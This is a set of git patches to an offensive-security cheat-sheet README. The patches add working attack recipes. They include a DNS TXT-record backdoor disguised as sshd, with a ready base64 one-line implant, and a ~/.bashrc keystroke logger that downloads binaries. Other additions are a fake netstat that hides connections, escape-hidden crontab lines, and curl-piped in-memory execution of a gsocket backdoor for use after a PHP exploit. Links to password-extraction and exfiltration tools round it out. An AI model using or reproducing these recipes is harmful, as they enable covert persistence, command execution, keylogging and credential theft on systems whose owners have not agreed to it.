From 8144cf33f37e2cbf5d0a0577be2572ca4efbf0ad Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 4 May 2025 18:49:00 +0100 Subject: [PATCH 01/23] Update README.md --- README.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 9453018..2f66a9b 100644 --- a/README.md +++ b/README.md @@ -595,7 +595,12 @@ bore local 31337 --to bore.pub using [serveo.net](https://serveo.net) (free): ```sh # Forward a random public TCP port to localhost:31337 -ssh -R 0:localhost:31337 serveo.net +ssh -R 0:localhost:31337 tcp@serveo.net +``` + +using [pinggy.io](https://www.pinggy.io) (60 mins free): +```sh +ssh -p 443 -R 0:localhost:31337 tcp@a.pinggy.io ``` See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [playit](https://playit.gg/) (free) or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. From f94aeb5730a639dd5a8d83c5813f2a3f1dc770a2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 6 May 2025 13:54:04 +0100 Subject: [PATCH 02/23] Update README.md --- README.md | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/README.md b/README.md index 2f66a9b..1450b42 100644 --- a/README.md +++ b/README.md @@ -1869,6 +1869,42 @@ Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` +An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): +- Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups` +- Requests a TXT record every 60 minutes (from b00m2.team-teso.net). +- Base64-decode the TXT record and execute the command on the target. + +1. Modify the following to your liking and then Cut & Paste it to get the 1-line implant. + +```shell +base64 -w0 >x.txt <<-'EOF' +D=b00m2.team-teso.net +P="sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups" +M=/dev/shm/.cache${UID} +[ -f $M ]&&exit +touch $M +(echo 'slp(){ local IFS;[ -n "${_sfd:-}" ]||exec {_sfd}<> <(:);read -t$1 -u$_sfd||:;} +slp 1 +while :; do + dig +short '"$D"' TXT|tr -d \ \"|base64 -d|bash + slp 3600 +done'|exec -a "$P" bash &) &>/dev/null +EOF +echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( **6.vii. Local Root Backdoor** From e10d58b301a92de9bbc47dfd35c534cfee045ae4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 6 May 2025 13:56:28 +0100 Subject: [PATCH 03/23] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1450b42..05d857b 100644 --- a/README.md +++ b/README.md @@ -1899,7 +1899,7 @@ echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Date: Tue, 6 May 2025 14:13:09 +0100 Subject: [PATCH 04/23] Update README.md --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 05d857b..11ca032 100644 --- a/README.md +++ b/README.md @@ -1870,11 +1870,12 @@ bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 ``` An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): +- Depends on bash, dig and base64 only. - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups` -- Requests a TXT record every 60 minutes (from b00m2.team-teso.net). -- Base64-decode the TXT record and execute the command on the target. +- Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net). +- Base64-decodes the TXT record and executes the command on the target. -1. Modify the following to your liking and then Cut & Paste it to get the 1-line implant. +1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. ```shell base64 -w0 >x.txt <<-'EOF' @@ -1893,7 +1894,7 @@ EOF echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Date: Tue, 6 May 2025 14:15:43 +0100 Subject: [PATCH 05/23] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 11ca032..9a6b868 100644 --- a/README.md +++ b/README.md @@ -1873,9 +1873,9 @@ An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): - Depends on bash, dig and base64 only. - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups` - Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net). -- Base64-decodes the TXT record and executes the command on the target. +- Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m). -1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. +1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. ```shell base64 -w0 >x.txt <<-'EOF' @@ -1892,6 +1892,7 @@ while :; do done'|exec -a "$P" bash &) &>/dev/null EOF echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Date: Tue, 6 May 2025 15:06:42 +0100 Subject: [PATCH 06/23] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 9a6b868..b91b5ad 100644 --- a/README.md +++ b/README.md @@ -1895,7 +1895,7 @@ echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Date: Tue, 6 May 2025 17:47:19 +0100 Subject: [PATCH 07/23] Update README.md --- README.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index b91b5ad..291b49c 100644 --- a/README.md +++ b/README.md @@ -1875,7 +1875,7 @@ An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): - Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net). - Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m). -1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. +1. Generate a 1-line implant: ```shell base64 -w0 >x.txt <<-'EOF' @@ -1895,6 +1895,11 @@ echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Date: Tue, 6 May 2025 17:47:51 +0100 Subject: [PATCH 08/23] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 291b49c..1444270 100644 --- a/README.md +++ b/README.md @@ -1896,7 +1896,7 @@ rm -f x.txt ``` Cut & paste the 1-line implant into the target: -``` +```shell echo RD1iMDBtMi50ZWFtLXRlc28ubmV0ClA9InNzaGQ6IC91c3Ivc2Jpbi9zc2hkIC1EIFtsaXN0ZW5lcl0gMCBvZiAxMC0xMDAgc3RhcnR1cHMiCk09L2Rldi9zaG0vLmNhY2hlJHtVSUR9ClsgLWYgJE0gXSYmZXhpdAp0b3VjaCAkTQooZWNobyAnc2xwKCl7IGxvY2FsIElGUztbIC1uICIke19zZmQ6LX0iIF18fGV4ZWMge19zZmR9PD4gPCg6KTtyZWFkIC10JDEgLXUkX3NmZHx8Ojt9CnNscCAxCndoaWxlIDo7IGRvCmRpZyArc2hvcnQgJyIkRCInIFRYVHx0ciAtZCBcIFwifGJhc2U2NCAtZHxiYXNoCnNscCAzNjAwCmRvbmUnfGV4ZWMgLWEgIiRQIiBiYXNoICYpICY+L2Rldi9udWxsCg==|base64 -d|bash ``` From 32f77ebba2bc828c9539e20d9bca53ab6d9fbbda Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 12 May 2025 12:26:15 +0100 Subject: [PATCH 09/23] Update README.md --- README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/README.md b/README.md index 1444270..bc248d3 100644 --- a/README.md +++ b/README.md @@ -1878,6 +1878,9 @@ An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): 1. Generate a 1-line implant: ```shell +# If dig does not exists then replace /dig +short.../ with +# /nslookup -q=txt '"$D"'|grep -Fm1 "text ="|sed -E "s|.*text = (.*)|\1|g;s|[\" ]||g"|base64 -d +# or use the Perl example below. base64 -w0 >x.txt <<-'EOF' D=b00m2.team-teso.net P="sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups" @@ -1911,6 +1914,19 @@ ExecStartPre=/usr/sbin/sshd -t ExecStart=/usr/sbin/sshd -D $SSHD_OPTS ... ``` + +The same but only needing perl + bash (not dig): +```shell +perl -MMIME::Base64 -e '$/=undef;print encode_base64(<>,"")' >x.txt <<-'EOF' +D=b00m2.team-teso.net +P="sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups" +M=/dev/shm/.cache-1-${UID} +(echo 'use Net::DNS;use MIME::Base64;exit(0) if -e "'"$M"'";close(open($f,">","'"$M"'"));for (;;) { system decode_base64((Net::DNS::Resolver->new->query(q/'"$D"'/,q/TXT/)->answer)[0]->txtdata=~y/ \\//dr);sleep(3600)}'|exec -a "$P" perl &) &>/dev/null +EOF +echo "===> Execute the following on the target:"$'\n\033[0;36m'"perl -MMIME::Base64 -e'print decode_base64(\"$( **6.vii. Local Root Backdoor** From 0cef357e7a9f5d6074cbc7e973ef9b8ce51e4170 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 12 May 2025 20:58:43 +0100 Subject: [PATCH 10/23] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index bc248d3..03af0ac 100644 --- a/README.md +++ b/README.md @@ -2351,13 +2351,15 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co Deploy: Cut & paste the following onto the target and follow the instructions: ```sh +# This is a glorified version of: +# [ -z "$LC_PTY" ] && [ -t 0 ] && [[ "$HISTFILE" != *null* ]] && [ -d ~/.config/.pty ] && { script -V; } &>/dev/null && LC_PTY=1 exec -a "sshd: pts/0" script -fqaec "exec ${BASH_EXECUTION_STRING:--a -bash '"$(command -v bash)"'}" -I ~/.config/.pty/.@pty-unix.$$ command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; :; } \ && curl -o ~/.config/.pty/pty -fsSL "https://bin.pkgforge.dev/$(uname -m)/script" \ && curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \ && chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ && echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \ -&& echo -e '[ -z "$LC_PTY" ] && [ -t 0 ] && [[ "$HISTFILE" != *null* ]] && { ~/.config/.pty/ini -h && ~/.config/.pty/pty -V; } &>/dev/null && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec ${BASH_EXECUTION_STRING:--a -bash '"$(command -v bash)"'}" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& echo -e '[ -z "$LC_PTY" ] && [ -t 0 ] && [[ "$HISTFILE" != *null* ]] && [ -d ~/.config/.pty ] && { ~/.config/.pty/ini -h && ~/.config/.pty/pty -V; } &>/dev/null && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec ${BASH_EXECUTION_STRING:--a -bash '"$(command -v bash)"'}" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From 45e04200412cdc362459a6855050c29741fe42bd Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 13 May 2025 10:58:11 +0100 Subject: [PATCH 11/23] Update README.md --- README.md | 76 ++++++++++++++++++++++++++++++++++++++----------------- 1 file changed, 53 insertions(+), 23 deletions(-) diff --git a/README.md b/README.md index 03af0ac..29eef46 100644 --- a/README.md +++ b/README.md @@ -257,8 +257,8 @@ eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c20 Create a fake netstat binary in /usr/local/sbin. On a default Debian (and most Linux) the PATH variables (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat. ```shell -echo -e "#! /bin/bash -exec /usr/bin/netstat \"\$@\" | grep -Fv -e :22 -e 1.2.3.4" >/usr/local/sbin/netstat \ +echo '#! /bin/bash +exec /usr/bin/netstat "$@" | grep -Fv -e :22 -e 1.2.3.4' >/usr/local/sbin/netstat \ && chmod 755 /usr/local/sbin/netstat \ && touch -r /usr/bin/netstat /usr/local/sbin/netstat ``` @@ -330,7 +330,11 @@ echo -e "id #\\033[2K\\033[1A" >>~/.bashrc ### The '#' after the command 'id' is a comment and is needed so that bash still ### executes the 'id' but ignores the two ANSI escape sequences. ``` -Note: We use `echo -e` to convert `\\033` to the ANSI escape character (hex 0x1b). + +Add a hidden crontab line: +```sh +(crontab -l; echo -e "0 2 * * * { id; date;} 2>/dev/null >/tmp/.thc-was-here #\\033[2K\\033[1A") | crontab +``` Adding a `\r` (carriage return) goes a long way to hide your ssh key from `cat`: ```shell @@ -386,6 +390,7 @@ xssh() { stty "${ttyp}" } ``` +(See [Hackshell](https://github.com/hackerschoice/hackshell)) **2.ii Multiple shells via 1 SSH/TCP connection** @@ -665,7 +670,7 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese Bounce through a host/router without needing to run a userland proxy or forwarder: ```sh -ipfwinit() { +bounceinit() { echo 1 >/proc/sys/net/ipv4/ip_forward echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet [ $# -le 0 ] && set -- "0.0.0.0/0" @@ -679,18 +684,20 @@ ipfwinit() { iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark } -ipfw() { +bounce() { iptables -t nat -A PREROUTING -p tcp --dport "${1:?}" -m mark --mark 1188 -j DNAT --to ${2:?}:${3:?} } -ipfwinit # Allow EVERY IP to bounce -# ipfwinit "1.2.3.4/16" "6.6.0.0/16" # Only allow these SOURCE IP's to bounce +bounceinit # Allow EVERY IP to bounce +# bounceinit "1.2.3.4/16" "6.6.0.0/16" # Only allow these SOURCE IP's to bounce ``` +(See [Hackshell](https://github.com/hackerschoice/hackshell) `bounce`) + Then set forwards like so: ```sh -ipfw 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port. -ipfw 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost) -ipfw 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443 +bounce 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port. +bounce 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost) +bounce 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443 ``` We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. @@ -863,7 +870,27 @@ nmap nmap -n -Pn -sCV -F --open --min-rate 10000 scanme.nmap.org nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org ``` -Using bash: +Scan for open TCP ports: +```sh +_scan_single() { + local opt=("${2}") + [ -f "$2" ] && opt=("-iL" "$2") + nmap -Pn -p"${1}" --open -T4 -n -oG - "${opt[@]}" 2>/dev/null | grep -F Ports +} +scan() { + local port="${1:?}" + shift 1 + for ip in "$@"; do + _scan_single "$port" "$ip" + done +} +# scan ... +# scan 22,80,443 192.168.0.1 +# scan - 192.168.0.1-254" 10.0.0.1-254 +``` +(See [Hackshell](https://github.com/hackerschoice/hackshell) `scan`) + +Simple bash port-scanner: ```shell timeout 5 bash -c " **8.viii. Deploying a backdoor without touching the file-system** -How to start a backdoor without writing to the file-system or when all writeable locations are mounted with the evil `noexec`-flag. +Start a backdoor without writing to the file-system or when all writeable locations are mounted with the evil `noexec`-flag. -A Perl one-liner to load a binary into memory and execute it (without touching any disk or /dev/shm or /tmp). +A Perl one-liner to load a binary into memory and execute it (without touching any disk or /dev/shm or /tmp). See [Hackshell](https://github.com/hackerschoice/hackshell/blob/main/hackshell.sh) for more. ```sh memexec() { local stropen strread @@ -2242,7 +2269,7 @@ exec {"/proc/$$/fd/$f"} '"${strargv0}"'@ARGV or die "exec: $!";' -- "$@" The shortest possible variant is (example): ```shell -memexec(){ perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@";} +memexec(){ perl '-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@";} # Example: cat /usr/bin/id | memexec -u ``` (Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions and [previous work](https://captain-woof.medium.com/how-to-execute-an-elf-in-memory-living-off-the-land-c7e67dbc3100) by others) @@ -2254,13 +2281,13 @@ GS_ARGS="-ilqD -s SecretChangeMe31337" memexec <(curl -SsfL https://gsocket.io/b The backdoor can also be piped via SSH directly into the remote's memory, and executed: ```sh -MX='-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' +MX='-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | ssh root@foobar "exec perl '$MX' -- -ilqD -s SecretChangeMe31337" ``` If you have a single-shot at remote executing a command (like via a PHP exploit) then this is your line: ```sh -curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- -ilqD -s SecretChangeMe31337 +curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- -ilqD -s SecretChangeMe31337 ``` --- @@ -2552,18 +2579,19 @@ Many other services (for free) Reverse DNS from multiple public databases: ```sh rdns () { - curl -fsSL "https://ip.thc.org/api/v1/download?ip_address=${1:?}&limit=10&apex_domain=${2}" | column -t -s, + curl -m10 -fsSL "https://ip.thc.org/${1:?}?limit=20&f=${2}" } # rdns ``` -Find sub domains from TLS Database: +Find sub domains from TLS/THC-IP Database: ```sh -crt() { +sub() { [ $# -ne 1 ] && { echo >&2 "crt "; return 255; } curl -fsSL "https://crt.sh/?q=${1:?}&output=json" --compressed | jq -r '.[].common_name,.[].name_value' | anew | sed 's/^\*\.//g' | tr '[:upper:]' '[:lower:]' + curl -fsSL "https://ip.thc.org/sb/${1:?}" } -# crt +# sub ``` | OSINT Hacker Tools || @@ -2667,7 +2695,8 @@ Phishing 2. https://da.gd/ - Tinier TinyUrl and allows https://www.google.com-fish-fish@da.gd/blah Tools -1. https://github.com/guitmz/ezuri - Obfuscate Linux binaries +1. https://github.com/hackerschoice/bincrypter - Obfuscate & pack _any_ Linux binaries +1. https://github.com/guitmz/ezuri - Obfuscate Linux binaries (ELF only) 1. https://tmate.io/ - Share a screen with others Callback / Canary / Command & Control @@ -2682,7 +2711,8 @@ Tunneling Exfil 1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt` -2. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server +2. [Segfault.net](https://thc.org/segfault) - type `exfil` +3. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server 1. [Mega](https://mega.io/cmd) 2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at` 3. [0x0.at](https://0x0.st) - `curl -F'file=@foo.txt' https://0x0.st/` From bb574403f2eb351631dafd0b24d0332e2f43de1e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 13 May 2025 11:04:12 +0100 Subject: [PATCH 12/23] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 29eef46..de512d2 100644 --- a/README.md +++ b/README.md @@ -2057,14 +2057,15 @@ wfind() { # Usage: wfind /etc /var /usr ``` -Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)): +Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker) or [trufflehog](https://github.com/trufflesecurity/trufflehog)): ```sh curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static chmod 700 np && \ ./np scan . && \ ./np report --color=always | less -R ``` -(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history) +- Use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history +- Extract passwords from Browsers using [https://github.com/kiryano/chrome-password-decryptor](https://github.com/kiryano/chrome-password-decryptor) Using `grep`: ```sh From 167c181439f1e017888c52115257be67d8172695 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 13 May 2025 11:09:24 +0100 Subject: [PATCH 13/23] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index de512d2..00ff423 100644 --- a/README.md +++ b/README.md @@ -167,6 +167,12 @@ resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read # stty sane rows 60 cols 160 ``` +We use `anew` a lot, and this is a quick workaround: +```shell +xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } +which anew &>/dev/null || alias anew=xanew +``` + Bonus tip: Any command starting with a " " (space) will [not get logged to history](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) either. ``` From 2706fe4fcaf7d7d8a977910bf2689fb5ab6e9805 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 13 May 2025 13:33:00 +0100 Subject: [PATCH 14/23] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 00ff423..12a9a72 100644 --- a/README.md +++ b/README.md @@ -2071,6 +2071,7 @@ chmod 700 np && \ ./np report --color=always | less -R ``` - Use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history +- Use [Chrome-ABE](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption) to extract & decrypt Chrome passwords from the running process (windows only) - Extract passwords from Browsers using [https://github.com/kiryano/chrome-password-decryptor](https://github.com/kiryano/chrome-password-decryptor) Using `grep`: From c1c298bb70f3ced8dce68a6ec0a77ce35a05f078 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 26 May 2025 20:21:23 +0100 Subject: [PATCH 15/23] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 12a9a72..d39d996 100644 --- a/README.md +++ b/README.md @@ -2195,7 +2195,7 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi **8.vi. Change user without sudo/su** -Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`) +Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg` or `import -window root screenshot.png`) ```bash xsu() { local name="${1:?}" From 29fba301e9af03ec38d9ff198cc7e81927b72437 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 26 May 2025 20:30:38 +0100 Subject: [PATCH 16/23] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d39d996..01b67c9 100644 --- a/README.md +++ b/README.md @@ -2195,7 +2195,7 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi **8.vi. Change user without sudo/su** -Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg` or `import -window root screenshot.png`) +Needed for taking screenshots of X11 sessions (aka `xwd -display :0 -silent -root | convert - jpg:screenshot.jpg` or `import -display :0 -window root screenshot.png`) ```bash xsu() { local name="${1:?}" From 6af1e0f731760801d7b659b39897de5888714355 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 27 May 2025 11:32:20 +0100 Subject: [PATCH 17/23] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 01b67c9..72f88e9 100644 --- a/README.md +++ b/README.md @@ -924,10 +924,10 @@ nice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2 Crack OpenSSH's `known_hosts` hashes to reveal the IP address: ```shell -curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/ipv4_hcmask.txt -o ipv4_hcmask.txt -curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/kh-converter.py -o kh-converter.py -python kh-converter.py ~/.ssh/known_hosts >~/.ssh/known_hosts_hashes -hashcat -m 160 --quiet --hex-salt ~/ssh/known_hosts_hashes -a 3 ipv4_hcmask.txt +curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/ipv4_hcmask.txt -O +curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/kh-converter.py -O +python3 kh-converter.py ~/.ssh/known_hosts >known_hosts_hashes +hashcat -m 160 --quiet --hex-salt known_hosts_hashes -a 3 ipv4_hcmask.txt ``` 👉 Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions). From 3a294e4fef56d41802ca0b1862cec6a1edd56d97 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 27 May 2025 16:28:15 +0100 Subject: [PATCH 18/23] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 72f88e9..9a0c875 100644 --- a/README.md +++ b/README.md @@ -2277,7 +2277,7 @@ exec {"/proc/$$/fd/$f"} '"${strargv0}"'@ARGV or die "exec: $!";' -- "$@" The shortest possible variant is (example): ```shell -memexec(){ perl '-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@";} +memexec(){ perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$",0)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV;exit 255' -- "$@";} # Example: cat /usr/bin/id | memexec -u ``` (Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions and [previous work](https://captain-woof.medium.com/how-to-execute-an-elf-in-memory-living-off-the-land-c7e67dbc3100) by others) @@ -2289,13 +2289,13 @@ GS_ARGS="-ilqD -s SecretChangeMe31337" memexec <(curl -SsfL https://gsocket.io/b The backdoor can also be piped via SSH directly into the remote's memory, and executed: ```sh -MX='-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' +MX='-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$",0)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV;exit 255' curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | ssh root@foobar "exec perl '$MX' -- -ilqD -s SecretChangeMe31337" ``` If you have a single-shot at remote executing a command (like via a PHP exploit) then this is your line: ```sh -curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-efor(319,279,385,4314,4354){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- -ilqD -s SecretChangeMe31337 +curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$",0)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV;exit 255' -- -ilqD -s SecretChangeMe31337 ``` --- From 46b1cebcb282d70a902cd7d9b7d716100ffe8926 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Jun 2025 18:22:31 +0100 Subject: [PATCH 19/23] Update README.md --- README.md | 58 +++++++++++++++++++++++++++++++++++++++++-------------- 1 file changed, 43 insertions(+), 15 deletions(-) diff --git a/README.md b/README.md index 9a0c875..04f5941 100644 --- a/README.md +++ b/README.md @@ -1880,6 +1880,8 @@ curl http://127.0.0.1:8080/x.php -d0='' -d1='echo file_get_contents("/etc/hosts" **6.vi. Smallest reverse DNS-tunnel Backdoor** +...in PHP: +--- Execute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger. Add this line (the implant) at the beginning of any PHP file: @@ -1896,23 +1898,24 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 - The implant is a `bootloader`. Use a while loop to download and execute larger paypload via DNS. - Check out our favorite places to [register a domain anonymously](#pub). [Cloudflare's](https://www.cloudflare.com) Free-Tier is a good start. -Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): +...in BASH: +--- +Add this implant to the target's `~/.bashrc` or the crontab (demo-paypload): ```shell -# Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: +# Use a "double bash" to 